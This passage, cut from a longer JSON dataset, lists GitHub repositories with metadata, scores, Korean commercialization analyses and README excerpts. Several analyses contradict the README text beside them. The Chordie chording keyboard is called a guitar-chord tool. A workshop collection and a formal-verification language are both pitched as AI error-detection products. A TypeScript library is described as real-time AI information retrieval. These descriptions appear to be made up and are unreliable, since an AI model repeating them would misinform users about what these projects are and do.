Its purpose is being a \"workhorse\" for model serving, by providing out-of-the-box support for popular DL/ML frameworks and unparalleled performance. **Redis-inference-optimization both maximizes computation throughput and reduces latency by adhering to the principle of data locality**, as well as simplifies the deployment and serving of graphs by leveraging on Redis' production-proven infrastructu","composite_score":0.1893,"license_safety_tag":"unknown"},{"name":"vinaygaba/Learn-Jetpack-Compose-By-Example","github_url":"https://github.com/vinaygaba/Learn-Jetpack-Compose-By-Example","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":9,"description":"# Learn Jetpack Compose By Example 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 최신 UI 만드는 방법을 배울 수 있는 실전 예제 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **안드로이드 개발 교육 플랫폼**: 초급자부터 중급자까지 단계별로 배우는 온라인 코스 제공\n2. **기업 내부 개발팀 교육**: 회사의 안드로이드 개","readme_excerpt":"# Learn Jetpack Compose By Example \n![Android CI](https://github.com/vinaygaba/Learn-Jetpack-Compose-By-Example/workflows/Android%20CI/badge.svg) ![Compose Version](https://img.shields.io/badge/Compose-1.0.1-brightgreen) ![Android Weekly](https://androidweekly.net/issues/issue-414/badge)\n\n![Feature Image](screenshots/jetpack_compose_poster.png)\n\nOver the course of the last few years Android development has gone\nthrough significant changes in how we structure our apps, the language\nwe use for development, the tooling & libraries that help us speed up\nour development and the improvements in testing our apps. What had not\nchanged in all these years is the Android UI toolkit. This changes with\nJetpack Compose that aims to re-imagine what Android UI development\nwould look like using declarative programming principles. It is heavily\ninfluenced by existing web and mobile frameworks such as React, Litho,\nVue & Flutter and would be a paradigm shift in Android UI development as\nwe know it.\n\nThis","composite_score":0.1891,"license_safety_tag":"safe"},{"name":"PaddlePaddle/PaddleSeg","github_url":"https://github.com/PaddlePaddle/PaddleSeg","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":4,"description":"# PaddlePaddle/PaddleSeg 분석 보고서\n\n## 왜 보물인가\n사진이나 영상에서 특정 물체를 자동으로 찾아내고 구분하는 AI 기술로, 자율주행차·의료진단·농업 등 다양한 산업에서 실제 수익을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 의료 영상 분석 SaaS**\n병원용 진단 보조 서비스로, 의사가 CT/MRI 사진 업로드 시 질","readme_excerpt":"简体中文 | [English](README_EN.md)\n\n<div align=\"center\">\n\n<p align=\"center\">\n  <img src=\"./docs/images/paddleseg_logo.png\" align=\"middle\" width = \"500\" />\n</p>\n\n**飞桨高性能图像分割开发套件，端到端完成从训练到部署的全流程图像分割应用。**\n\n[![License](https://img.shields.io/badge/license-Apache%202-blue.svg)](LICENSE)\n[![Version](https://img.shields.io/github/release/PaddlePaddle/PaddleSeg.svg)](https://github.com/PaddlePaddle/PaddleSeg/releases)\n![python version](https://img.shields.io/badge/python-3.6+-orange.svg)\n![support os](https://img.shields.io/badge/os-linux%2C%20win%2C%20mac-yellow.svg)\n![stars](https://img.shields.io/github/stars/PaddlePaddle/PaddleSeg?color=ccf)\n</div>\n\n<div align=\"center\">\n<img src=\"https://github.com/shiyutang/files/blob/9590ea6bfc36139982ce75b00d3b9f26713934dd/teasor.gif\"  width = \"800\" />  \n</div>\n\n## <img src=\"./docs/images/seg_news_icon.png\" width=\"20\"/> 最新动态\n\n- **🔥[2024-11-05] 添加语义分割领域低代码全流程开发能力**:\n  *  飞桨低代码开发工具PaddleX，支持了图像分割领域的**低代码全流程**开发能力：\n     * 🎨 [**模型丰富一键调用**](docs/paddlex/quick_st","composite_score":0.1885,"license_safety_tag":"safe"},{"name":"MinaSamir11/react-native-in-app-review","github_url":"https://github.com/MinaSamir11/react-native-in-app-review","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":4,"description":"# react-native-in-app-review 분석 보고서\n\n## 왜 보물인가\n휴대폰 앱에서 사용자 평점과 리뷰를 받을 수 있는 기능을 간단하게 만들어주는 도구로, 앱 개발자들의 필수 요청사항입니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발사의 내부 도구**: 자체 모바일 앱에 평점 시스템을 빠르게 추가하여 사용자 피드백 수집\n2. **SaaS 플","readme_excerpt":"# react-native-in-app-review\r\n\r\n![npm](https://img.shields.io/npm/dw/react-native-in-app-review?logo=npm)\r\n[![npm downloads](https://img.shields.io/npm/dm/react-native-in-app-review.svg) ](//npmjs.com/package/react-native-in-app-review)\r\n![npm](https://img.shields.io/npm/v/react-native-in-app-review?logo=npm)\r\n![Travis (.com) branch](https://img.shields.io/travis/com/MinaSamir11/react-native-in-app-review/master)\r\n![Coveralls github branch](https://img.shields.io/coveralls/github/MinaSamir11/react-native-in-app-review/master)\r\n\r\nThe Google Play In-App Review API, App Store rating API let you prompt users to submit Play Store or App Store ratings and reviews without the inconvenience of leaving your app or game.\r\n\r\nreact-native in-app-review, to rate on Play Store, and App Store, Generally, the in-app review flow (see figure 1 for Play Store, figure 2 for ios) can be triggered at any time throughout the user journey of your app. During the flow, the user has the ability to rate your app","composite_score":0.1884,"license_safety_tag":"safe"},{"name":"vi3k6i5/flashtext","github_url":"https://github.com/vi3k6i5/flashtext","stars":11,"language":"Python","license":"mit","abandonment_months":14,"description":"# flashtext 프로젝트 분석\n\n## 왜 보물인가\n텍스트에서 특정 단어나 문구를 매우 빠르게 찾아내고 바꿀 수 있는 도구로, 대량의 문서를 처리해야 하는 기업들에게 실질적인 시간 절약을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 채용공고 자동 분류 서비스**\n- 회사들이 올린 채용공고에서 기술 스택(Python, Java 등)을 자동으로 감지하","readme_excerpt":"=========\nFlashText\n=========\n\n.. image:: https://api.travis-ci.org/vi3k6i5/flashtext.svg?branch=master\n   :target: https://travis-ci.org/vi3k6i5/flashtext\n   :alt: Build Status\n\n.. image:: https://readthedocs.org/projects/flashtext/badge/?version=latest\n   :target: http://flashtext.readthedocs.io/en/latest/?badge=latest\n   :alt: Documentation Status\n\n.. image:: https://badge.fury.io/py/flashtext.svg\n   :target: https://badge.fury.io/py/flashtext\n   :alt: Version\n\n.. image:: https://coveralls.io/repos/github/vi3k6i5/flashtext/badge.svg?branch=master\n   :target: https://coveralls.io/github/vi3k6i5/flashtext?branch=master\n   :alt: Test coverage\n\n.. image:: https://img.shields.io/github/license/mashape/apistatus.svg?maxAge=2592000\n   :target: https://github.com/vi3k6i5/flashtext/blob/master/LICENSE\n   :alt: license\n\n\nThis module can be used to replace keywords in sentences or extract keywords from sentences. It is based on the `FlashText algorithm <https://arxiv.org/abs/1711.00046>`_.\n\n\nI","composite_score":0.1884,"license_safety_tag":"safe"},{"name":"mikel-brostrom/Yolov5_DeepSort_Pytorch","github_url":"https://github.com/mikel-brostrom/Yolov5_DeepSort_Pytorch","stars":12,"language":"Python","license":"AGPL-3.0","abandonment_months":0,"description":"# Yolov5_DeepSort_Pytorch 가치 분석\n\n## 왜 보물인가\nCCTV 영상에서 사람이나 물건을 자동으로 인식하고 추적하는 기술로, 보안·유통·교통 산업에서 수작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. CCTV 분석 SaaS 서비스**\n- 편의점·주차장 영상 자동 분석 및 고객 행동 패턴 제공 서비스\n\n**2. 공장","readme_excerpt":"<div align=\"center\" markdown=\"1\">\n\n  <img width=\"640\"\n       src=\"https://github.com/mikel-brostrom/boxmot/releases/download/v12.0.0/output_640.gif\"\n       alt=\"BoxMOT demo\">\n  <br>\n\n  <a href=\"https://trendshift.io/repositories/13239\" target=\"_blank\"><img src=\"https://trendshift.io/api/badge/repositories/13239\" alt=\"mikel-brostrom%2Fboxmot | Trendshift\" style=\"width: 250px; height: 55px;\" width=\"250\" height=\"55\"></a>\n\n  [![CI](https://github.com/mikel-brostrom/boxmot/actions/workflows/ci.yml/badge.svg)](https://github.com/mikel-brostrom/boxmot/actions/workflows/ci.yml)\n  [![PyPI version](https://badge.fury.io/py/boxmot.svg)](https://badge.fury.io/py/boxmot)\n  [![downloads](https://static.pepy.tech/badge/boxmot)](https://pepy.tech/project/boxmot)\n  [![license](https://img.shields.io/badge/license-AGPL%203.0-blue)](https://github.com/mikel-brostrom/boxmot/blob/master/LICENSE)\n  [![python-version](https://img.shields.io/pypi/pyversions/boxmot)](https://badge.fury.io/py/boxmot)\n  [![colab","composite_score":0.1882,"license_safety_tag":"risky"},{"name":"BlueM/cliclick","github_url":"https://github.com/BlueM/cliclick","stars":7,"language":"Objective-C","license":"NOASSERTION","abandonment_months":9,"description":"# BlueM/cliclick 사업화 분석\n\n## 왜 보물인가\n마우스와 키보드 조작을 자동으로 실행해주는 도구로, 반복적인 컴퓨터 작업을 손쉽게 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 자동화 도구**: 회계팀이 매일 반복되는 송금, 보고서 작성, 데이터 입력 작업을 자동으로 처리하는 기업용 솔루션\n2. **RPA(업무 자동화","readme_excerpt":"cliclick Overview\n=========================\n\ncliclick (short for “Command Line Interface Click”) is a tool for executing mouse- and keyboard-related actions from the shell/Terminal. It is written in Objective-C and runs on macOS 10.15 or later.\n\nAuthor: Carsten Blüm, [www.bluem.net](https://www.bluem.net/)\n\nInstallation\n--------------\nIf you don’t want to build cliclick yourself (see below), it is strongly recommended to install using [Homebrew](https://formulae.brew.sh/formula/cliclick). \nCliclick is also available on [MacPorts](https://ports.macports.org/port/cliclick/), but at the time of writing this, MacPorts does not offer the most recent version. You could also choose a binary from the [releases](https://github.com/BlueM/cliclick/releases) page, you will likely run into trouble running it (especially on a Mac with Apple Silicon processor), thanks to macOS’s security mechanisms.\n\n*In either case:* it is necessary to give Terminal (or iTerm or whatever you use) the permission to c","composite_score":0.1881,"license_safety_tag":"unknown"},{"name":"testing-library/react-testing-library","github_url":"https://github.com/testing-library/react-testing-library","stars":10,"language":"JavaScript","license":"mit","abandonment_months":2,"description":"# React Testing Library 상용화 분석\n\n## 왜 보물인가\n웹 개발자들이 만든 프로그램이 제대로 작동하는지 검증하는 도구로, 개발 생산성을 높이면서 버그를 사전에 잡을 수 있는 필수 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 자동 테스트 플랫폼 - 개발사들이 월 구독으로 코드 검증 서비스를 이용하도","readme_excerpt":"<div align=\"center\">\n<h1>React Testing Library</h1>\n\n<a href=\"https://www.emojione.com/emoji/1f410\">\n  <img\n    height=\"80\"\n    width=\"80\"\n    alt=\"goat\"\n    src=\"https://raw.githubusercontent.com/testing-library/react-testing-library/main/other/goat.png\"\n  />\n</a>\n\n<p>Simple and complete React DOM testing utilities that encourage good testing\npractices.</p>\n\n<br />\n\n[**Read The Docs**](https://testing-library.com/react) |\n[Edit the docs](https://github.com/testing-library/testing-library-docs)\n\n<br />\n</div>\n\n<hr />\n\n<!-- prettier-ignore-start -->\n[![Build Status][build-badge]][build]\n[![Code Coverage][coverage-badge]][coverage]\n[![version][version-badge]][package]\n[![downloads][downloads-badge]][npmtrends]\n[![MIT License][license-badge]][license]\n[![All Contributors][all-contributors-badge]](#contributors)\n[![PRs Welcome][prs-badge]][prs]\n[![Code of Conduct][coc-badge]][coc]\n[![Discord][discord-badge]][discord]\n\n[![Watch on GitHub][github-watch-badge]][github-watch]\n[![Star on GitHub","composite_score":0.1881,"license_safety_tag":"safe"},{"name":"kbjunky/Chordie","github_url":"https://github.com/kbjunky/Chordie","stars":8,"language":"C","license":"MIT","abandonment_months":9,"description":"# Chordie 저장소 분석\n\n## 왜 보물인가\n음악을 배우려는 사람들이 기타 코드를 쉽게 찾고 배울 수 있는 간단한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **음악 학습 앱 서비스**: 기타 초보자를 위한 월 구독형 코드 학습 플랫폼\n2. **음악 교육 기관 내부 도구**: 음악 학원이나 강사들이 학생 관리용으로 사용하는 도구\n3. **음악 출판사","readme_excerpt":"# **This project is deprecated, check back soon for an updated version of Chordie** #\n# **Chordie**\n## **A chording keyboard you shouldn't be scared of**\n\n![](/img/chordie1.png)\n\n***Chordie \"It\" inspired picture courtesy of [Sean Yin](https://www.coroflot.com/sean_yin)***\n\n![](/img/mxchocchordie.png)\n\n\n\n\n### Chordie is a chording keyboard heavily inspired by [gBoards' Ginny keyboard](https://www.gboards.ca/product/ginni) running on awesome chording engine by [DennyTom](https://github.com/DennyTom/qmk_firmware/tree/feature/buttery_engine_v2/users/dennytom/chording_engine). It supports all 104 keys found on normal keyboards and much more in large part thanks to [ASETNIOP](http://asetniop.com/) layout. For a complete experience it's also equipped with trackball. Except for the mouse sensor module whole assembly can be handwired in about 6 hours.\n\n## **BOM**\n|Item                                       |Count  |Example|\n|:---                                       |:---:  |:---:|\n|MCP23017 I","composite_score":0.1877,"license_safety_tag":"safe"},{"name":"Microsoft/dotnet","github_url":"https://github.com/Microsoft/dotnet","stars":9,"language":"HTML","license":"mit","abandonment_months":8,"description":"# Microsoft/dotnet 저장소 분석\n\n## 왜 보물인가\n마이크로소프트가 공식 관리하는 .NET은 전 세계 수백만 개발자가 사용하는 기본 도구로, 기업 소프트웨어 개발의 핵심 기반입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 비즈니스 소프트웨어(회계, 인사관리, 재무 분석 플랫폼)를 빠르고 안정적으로 구축\n2. *","readme_excerpt":"# .NET Home\n\nThis repository is a starting point to learn about and engage in [.NET](https://dot.net) and .NET open source projects.\n\nThis repository is not an official .NET or .NET Framework support location, however, we will respond to issues filed here as best we can. Please file .NET product issues at main project repos below.\n\n## In this repository\n\n- [.NET Framework Release Notes](releases/README.md)\n- [.NET Framework Documentation](Documentation/README.md)\n- [.NET Open Source Developer Projects](dotnet-developer-projects.md)\n- [.NET Open Source Consumer Projects](dotnet-consumer-projects.md)\n- [Free Services & Tools for Open Source .NET Projects](dotnet-free-oss-services.md)\n\nPlease contribute to this repository via [pull requests](https://github.com/Microsoft/dotnet/pulls)\n\n## Finding .NET Open Source Projects\n\nHere are some excellent community-maintained lists of projects & libraries:\n\n- [Awesome .NET](https://github.com/quozd/awesome-dotnet)\n- [Awesome .NET MAUI](https://gith","composite_score":0.1873,"license_safety_tag":"safe"},{"name":"Lolliedieb/lolMiner-releases","github_url":"https://github.com/Lolliedieb/lolMiner-releases","stars":5,"language":"","license":"unknown","abandonment_months":8,"description":"# lolMiner-releases 분석\n\n## 왜 보물인가\n채굴이라는 특화된 분야에서 5년 이상 꾸준히 업데이트되는 검증된 도구로, 관심 있는 사용자들 사이에서 신뢰도가 높습니다.\n\n## 어디에 쓸 수 있나\n\n1. **채굴 풀 운영 SaaS**: 채굴자들이 이 도구를 쉽게 사용할 수 있도록 클라우드 기반 서비스로 제공하는 방식\n2. **채굴 최적화 API","readme_excerpt":"# lolMiner \n### AMD & Nvidia & Intel Miner for Etchash, Autolykos2, Beam, Grin, Ae, ALPH, Flux, Equihash, Kaspa, Nexa, Ironfish, Conflux, Karlsen and Pyrin and more\n### Best Dual Miner for ALPH and GRAM and KARLSEN and PYRIN and RADIANT with full Unlock LHR in all ALGOs\n\nA git repository for lolMiner release versions\n\n* Downloads releases : https://github.com/Lolliedieb/lolMiner-releases/releases\n* Helpful information in : https://github.com/Lolliedieb/lolMiner-releases/wiki\n* Telegram Group : https://t.me/lolMiner\n* Discord Group :  https://discord.gg/jvfRvK5wTv\n* Youtube Channel : https://www.youtube.com/c/lolMinerSupport\n\n## Supported Algorithm\n\n| Algorithm  | Fee % |\n| ------------- | ------------- |\n| Alephium | 0.75  |\n| Autolykos V2 | 1.5  | \n| BeamHash III | 1.0  |\n| Cuckoo 29 | 2.0  |\n| CuckarooD 29 | 2.0 |\n| CuckarooM 29 | 2.0 | \n| Cuckaroo 30 CTXC | 2.5 |\n| Cuckatoo 31 | 2.0 |\n| Cuckatoo 32 | 2.0 |\n| Dual ETC + (KAS/ALEPH) | 1.0 / 0.0 |\n| Dual ETH (ETHW) + (KAS/ALEPH) | 1.0 ","composite_score":0.187,"license_safety_tag":"unknown"},{"name":"PoCInnovation/Workshops","github_url":"https://github.com/PoCInnovation/Workshops","stars":16,"language":"Jupyter Notebook","license":"MIT","abandonment_months":5,"description":"# PoCInnovation/Workshops 상용화 분석\n\n## 왜 보물인가\nAI 시스템의 실수를 자동으로 찾아내는 기술로, 기업들이 신뢰할 수 없는 AI 답변으로 인한 손실을 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 챗봇 검수 플랫폼 - 기업이 고객 상담에 AI를 쓸 때 틀린 답변을 자동으로 걸러내는 서비스","readme_excerpt":"# Workshops &nbsp;[![PoC Logo](./.github/favicon.png)](https://poc-innovation.fr)\n\nAll workshop subjects and materials for developers. Made with ❤️.\n\n- 🧠 [AI](./ai/)\n- 👓 [AR/VR](./ar_vr/)\n- 🛠️ [Hardware](./hardware/)\n- 🔑 [Security](./security/)\n- 💻 [Software](./software/)\n- 🕸️ [Peer-to-Peer](./p2p/)\n\n<h2 align=center>\nOrganization\n</h2>\n<br/>\n<p align='center'>\n    <a href=\"https://www.linkedin.com/company/pocinnovation/mycompany/\">\n        <img src=\"https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white\" alt=\"LinkedIn logo\">\n    </a>\n    <a href=\"https://www.instagram.com/pocinnovation/\">\n        <img src=\"https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white\" alt=\"Instagram logo\"\n>\n    </a>\n    <a href=\"https://twitter.com/PoCInnovation\">\n        <img src=\"https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white\" alt=\"Twitter logo\">\n    </a>\n    <a href=\"https://disc","composite_score":0.1864,"license_safety_tag":"safe"},{"name":"blainehansen/magma","github_url":"https://github.com/blainehansen/magma","stars":6,"language":"Rocq Prover","license":"unknown","abandonment_months":0,"description":"# Magma 저장소 분석\n\n## 왜 보물인가\nAI 시스템이 잘못된 답변을 만들어내는 현상을 감지하고 수정하는 기술로, 신뢰할 수 없는 AI의 문제를 직접 해결합니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 채팅 서비스**: 고객 상담용 챗봇이 정확한 답변을 제공하도록 자동으로 검증하고 오류를 바로잡는 기능\n2. **금융/의료 업체 내부 도구**: 은행","readme_excerpt":"# :construction: Magmide is dormant for now as I rethink what it could/should be :construction:\n\nThis repo is still very early and rough, it's mostly just notes, speculative writing, and exploratory theorem proving. Most of the files in this repo are just \"mad scribblings\" that I haven't refined enough to actually stand by!\n\nIf you prefer video, this presentation talks about the core ideas that make formal verification and Magmide possible, and the design goals and intentions of the project:\n\n[![magmide talk](https://img.youtube.com/vi/Lf7ML_ErWvQ/0.jpg)](https://www.youtube.com/watch?v=Lf7ML_ErWvQ)\n\nIn this readme I give a broad overview and answer a few possible questions. Enjoy!\n\n---\n\nThe goal of this project is to: **create a programming language capable of making formal verification and provably correct software practical and mainstream**. The language and its surrounding education/tooling ecosystem should provide a foundation strong enough to create verified software for any syst","composite_score":0.1864,"license_safety_tag":"unknown"},{"name":"lihuacai168/AnotherFasterRunner","github_url":"https://github.com/lihuacai168/AnotherFasterRunner","stars":5,"language":"Python","license":"MIT","abandonment_months":4,"description":"# AnotherFasterRunner 상용화 분석\n\n## 왜 보물인가\n자동으로 소프트웨어 품질을 검증하는 도구로, 개발팀이 버그를 빠르게 찾아내고 서비스 출시 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 자동 품질 검사 플랫폼으로 중소 IT회사들에게 월 구독료 징수\n- **내부 업무 도구**: 대형 금","readme_excerpt":"[![LICENSE](https://img.shields.io/github/license/HttpRunner/FasterRunner.svg)](https://github.com/HttpRunner/FasterRunner/blob/master/LICENSE)\n# FasterRunner\n\n> **⚠️ 项目停止维护声明**\n> \n> 本项目已停止维护，作者全身心投入到 Web3 搞钱去了。\n> \n> - 博客（长期更新）：https://blog.huacai.one/\n> - 电报闲聊群：https://t.me/+E8NoxjsKaPZkZDI9\n> - Web3 交流群：https://t.me/hc_alpha_bot\n\n🚀 让接口测试更简单，让自动化更快速！\n\n- [X] 🚀 **落地实战** - 已在 5+ 个公司中落地实战，效果显著\n- [X] 🔄 **无缝同步** - 支持一键同步 YAPI（Swagger，Postman）接口数据，告别手动录入的繁琐\n- [X] 💪 **强大引擎** - 基于Pythone3 + Requests 打造，轻松应对各类 HTTP(S) 测试场景，稳定可靠\n- [X] 🔐 **灵活扩展** - 通过 debugtalk.py 自定义函数，轻松实现接口签名、加解密等自定义功能\n- [X] 🎯 **完美联动** - 强大的 hook 机制，优雅处理接口间的token依赖和参数传递，打通测试全流程\n- [X] ⏰ **智能调度** - 内置 crontab 定时任务，无学习成本，帮你实现自动化监控\n- [X] 📊 **数据驱动** - 支持测试用例参数化，释放测试人员生产力\n- [X] 🔄 **持续集成** - 完美对接 Gitlab-CI、Jenkins 等CI工具，助力研发效能提升\n- [X] 📈 **清晰报告** - 简洁美观的测试报告，包含详尽的统计信息和日志记录，一目了然\n- [X] 📱 **即时通知** - 自动推送测试报告至飞书、钉钉、企业微信，随时掌握测试动态\n\n![](https://cdn.jsdelivr.net/gh/lihuacai168/images/img/project_detail.png)\n\n# 📐 系统架构\n\n```mermaid\ngraph TB\n    ","composite_score":0.1863,"license_safety_tag":"safe"},{"name":"postmanlabs/newman","github_url":"https://github.com/postmanlabs/newman","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":2,"description":"# Newman 저장소 분석\n\n## 왜 보물인가\nAPI 자동 테스트 도구로, 기업들이 웹 서비스 품질을 빠르게 검증할 수 있게 해주는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **API 테스트 자동화 SaaS**: 기업의 웹 서비스가 정상 작동하는지 자동으로 매일 점검해주는 클라우드 서비스\n2. **개발팀 내부 도구**: 소프트웨어 개발자들이 코","readme_excerpt":"<a href=\"https://www.postman.com/\"><img src=\"https://assets.getpostman.com/common-share/postman-logo-horizontal-320x132.png\" /></a><br />\n_Manage all of your organization's APIs in Postman, with the industry's most complete API development environment._\n\n# newman <sub>_the cli companion for postman_</sub> [![Build Status](https://github.com/postmanlabs/newman/actions/workflows/ci.yml/badge.svg?branch=develop)](https://github.com/postmanlabs/newman/actions/workflows/ci.yml) [![codecov](https://codecov.io/gh/postmanlabs/newman/branch/develop/graph/badge.svg)](https://codecov.io/gh/postmanlabs/newman)\n\nNewman is a command-line collection runner for Postman. It allows you to effortlessly run and test a Postman collection directly from the command-line. It is built with extensibility in mind so that you can easily integrate it with your continuous integration servers and build systems.\n\n\n## Table of contents\n\n1. [Getting Started](#getting-started)\n2. [Usage](#usage)\n    1. [Using Newman CLI","composite_score":0.1859,"license_safety_tag":"safe"},{"name":"feelfreelinux/octo4a","github_url":"https://github.com/feelfreelinux/octo4a","stars":6,"language":"Kotlin","license":"AGPL-3.0","abandonment_months":9,"description":"# octo4a 분석 보고서\n\n## 왜 보물인가\n안드로이드 폰을 개발 서버로 만들어주는 도구로, 누구나 자신의 휴대폰에서 프로그램을 개발하고 실행할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 개발자 교육 플랫폼 - 수강생들이 복잡한 컴퓨터 설치 없이 폰만으로 코딩 학습\n2. **내부 업무 도구**: 개발팀 협업 플랫","readme_excerpt":"# octo4a - Run OctoPrint on Android\n[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://paypal.me/feelfreelinux)\n![GitHub Sponsors](https://img.shields.io/github/sponsors/feelfreelinux)\n![IzzySoft](https://img.shields.io/endpoint?url=https://apt.izzysoft.de/fdroid/api/v1/shield/com.octo4a)\n\n\n![A banner visually expaining how the app works](.github/readme-banner.png)\n\nYou don't have a Raspberry Pi, but you want to control your 3D printer remotely? Use your phone as an octoprint host! With the Octo4a app you can install Octoprint on your android phone in minutes, without any special Linux knowledge.\n\n## Important note about charging and using OTG\n\nSome phones do not support simultaneous charging and USB on the go (OTG). Please consult this community contributed list of phones our users use, If you wish to buy a phone for the purpose of running octo4a:\n\nhttps://docs.google.com/spreadsheets/d/1pbKAELzvTrMVm6NpDpK8TfQR33w3QHQEgqkcGdbPFI0/edit?usp=sharing\n\nIf you have a","composite_score":0.1859,"license_safety_tag":"risky"},{"name":"TomerAberbach/lfi","github_url":"https://github.com/TomerAberbach/lfi","stars":15,"language":"TypeScript","license":"Apache-2.0","abandonment_months":5,"description":"# LFI 저장소 분석\n\n## 왜 보물인가\n실시간으로 변화하는 정보를 빠르게 찾아 반영해야 하는 AI 시스템의 핵심 약점을 해결하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스 기반 투자 조언 SaaS**: 최신 시장 정보를 즉시 반영하여 사용자에게 정확한 투자 추천을 제공하는 서비스\n2. **기업 내부 고객지원 도구**: 회사의 최신 정책·상품 ","readme_excerpt":"<div align=\"center\">\n  <img src=\"https://github.com/TomerAberbach/lfi/blob/main/sloth.svg\" alt=\"Sloth juggling office supplies\" width=\"400\" />\n</div>\n\n<h1 align=\"center\">\n  lfi\n</h1>\n\n<div align=\"center\">\n  <a href=\"https://npmjs.org/package/lfi\">\n    <img src=\"https://badgen.now.sh/npm/v/lfi\" alt=\"version\" />\n  </a>\n  <a href=\"https://github.com/TomerAberbach/lfi/actions\">\n    <img src=\"https://github.com/TomerAberbach/lfi/workflows/CI/badge.svg\" alt=\"CI\" />\n  </a>\n  <a href=\"https://unpkg.com/lfi/dist/index.min.js\">\n    <img src=\"https://deno.bundlejs.com/?q=lfi&badge\" alt=\"gzip size\" />\n  </a>\n  <a href=\"https://unpkg.com/lfi/dist/index.min.js\">\n    <img src=\"https://deno.bundlejs.com/?q=lfi&config={%22compression%22:{%22type%22:%22brotli%22}}&badge\" alt=\"brotli size\" />\n  </a>\n  <a href=\"https://github.com/sponsors/TomerAberbach\">\n    <img src=\"https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&color=%23fe8e86\" alt=\"Sponsor\" />\n  </a>\n</div>\n\n<div align=\"c","composite_score":0.1853,"license_safety_tag":"safe"},{"name":"pankod/superplate","github_url":"https://github.com/pankod/superplate","stars":8,"language":"TypeScript","license":"unknown","abandonment_months":9,"description":"# Superplate 저장소 분석\n\n## 왜 보물인가\n개발자들이 새로운 프로젝트를 빠르게 시작할 수 있도록 미리 만들어진 템플릿 모음을 제공하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀이 이 도구를 구독해 프로젝트 셋업 시간을 80% 단축하고 생산성을 높임\n2. **내부 업무 도구**: 기업의 IT팀이 표준화된 템플릿으","readme_excerpt":"<div align=\"center\">\n<p align='center'>\n<img src='images/cli.gif' width='500' alt='superplate example'>\n</p>\n</div>\n<br/>\n<div align=\"center\">A well-structured production-ready frontend boilerplate with Typescript, React Testing Library, styled-component, React Query, .env, Axios, Bundle Analyzer, Prettier and <b>30+ plugins</b>. <div><b>superplate</b> creates ready-to-develop projects for React and Next.js and refine.</div></div>\n<br/>\n\n<div align=\"center\">\n\n\n\n[![Meercode CI Score](https://meercode.io/badge/pankod/superplate?type=ci-score&branch=master&token=2ZiT8YsoJgt57JB23NYwXrFY3rJHZboT&lastDay=31)](https://meercode.io/)\n[![Meercode CI Success Rate](https://meercode.io/badge/pankod/superplate?type=ci-success-rate&branch=master&token=2ZiT8YsoJgt57JB23NYwXrFY3rJHZboT&lastDay=31)](https://meercode.io/)\n[![Maintainability](https://api.codeclimate.com/v1/badges/eb4b5a8f88b6e511e61d/maintainability)](https://codeclimate.com/github/pankod/superplate/maintainability)\n[![npm version](https","composite_score":0.1852,"license_safety_tag":"unknown"},{"name":"nightwatchjs/nightwatch","github_url":"https://github.com/nightwatchjs/nightwatch","stars":9,"language":"JavaScript","license":"mit","abandonment_months":2,"description":"# Nightwatch 저장소 분석\n\n## 왜 보물인가\n웹사이트가 제대로 작동하는지 자동으로 검사하는 도구로, 소프트웨어 회사들이 반복적인 테스트 작업을 줄일 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 애플리케이션 자동 검사 플랫폼으로 제공하여 스타트업과 중소 기업이 품질 관리 비용을 절감하도록 지원\n2. **내부 업","readme_excerpt":"# Nightwatch.js\n\n[![npm](https://img.shields.io/npm/v/nightwatch.svg)](https://www.npmjs.com/package/nightwatch)\n[![Node.js CI](https://github.com/nightwatchjs/nightwatch/actions/workflows/build-node.yaml/badge.svg?branch=main)](https://github.com/nightwatchjs/nightwatch/actions/workflows/build-node.yaml)\n[![codecov](https://codecov.io/gh/nightwatchjs/nightwatch/branch/main/graph/badge.svg?token=MSObyfECEh)](https://codecov.io/gh/nightwatchjs/nightwatch)\n[![Discord][discord-badge]][discord]\n\n\n\n<p align=\"center\">\n  <img alt=\"Nightwatch.js Logo\" src=\"https://raw.githubusercontent.com/nightwatchjs/nightwatch/main/.github/assets/nightwatch-logo.png\" width=300 />\n</p>\n\n#### [Homepage](https://nightwatchjs.org) &bullet; [Developer Guide](https://nightwatchjs.org/guide) &bullet; [API Reference](https://nightwatchjs.org/api) &bullet; [About](https://nightwatchjs.org/about) &bullet; [Blog](https://nightwatchjs.org/blog)\n\nNightwatch is an integrated testing framework powered by Node.js and using","composite_score":0.1852,"license_safety_tag":"safe"},{"name":"egametang/Egametang","github_url":"https://github.com/egametang/Egametang","stars":5,"language":"C#","license":"NOASSERTION","abandonment_months":5,"description":"# Egametang 저장소 분석\n\n## 왜 보물인가\n게임 개발에 필요한 기본 도구와 시스템을 한 곳에서 제공하는 오픈소스 프레임워크입니다.\n\n## 어디에 쓸 수 있나\n- **게임 개발 SaaS**: 인디 게임 개발자들이 구독하는 